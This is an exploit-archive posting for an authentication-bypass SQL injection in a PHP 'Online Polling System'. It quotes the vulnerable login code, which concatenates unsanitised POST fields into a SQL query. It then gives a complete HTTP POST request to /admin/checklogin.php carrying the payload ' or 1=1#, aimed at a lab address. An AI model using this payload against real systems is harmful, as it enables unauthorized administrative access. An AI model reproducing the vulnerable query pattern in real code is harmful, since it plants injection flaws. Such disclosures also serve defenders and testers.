Online Polling System SQL Injection

Online Polling System SQL Injection: Posted Jul 13, 2020; Authored by AppleBois; Online Polling System from sourcecodester.com suffers from a remote SQL injection vulnerability that allows for authentication bypass.; tags | exploit, remote, sql injection; SHA-256 | ea00ff15150a6d44f9dd08e68bd8acd244676fcf39a8175e01f172e8c9afcea2; Download | Favorite | View

Online Polling System SQL Injection

######################################################################################
# Exploit Title: Online Polling System Authentication Bypass SQL Injection
# Date: July 2020
# Author: AppleBois
# Version: NULL
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
#
# Administration Control Panel || Authentication Bypass
# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
#
######################################################################################
#Vulnerable Code
#
#$myusername=$_POST['myusername'];
#$mypassword=$_POST['mypassword'];
#$encrypted_mypassword=md5($mypassword);
#
#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
#
#$count=mysqli_num_rows($result);
#
#if($count==1){
#
#$user = mysqli_fetch_assoc($result);
#$_SESSION['member_id'] = $user['member_id'];
#header("location:student.php");
#}
#
######################################################################################


POST /admin/checklogin.php HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/online/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
Connection: close

myusername=' or 1=1#&mypassword=ad&Submit=Login

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Online Polling System SQL Injection

Online Polling System SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Polling System SQL Injection

Share This

Online Polling System SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems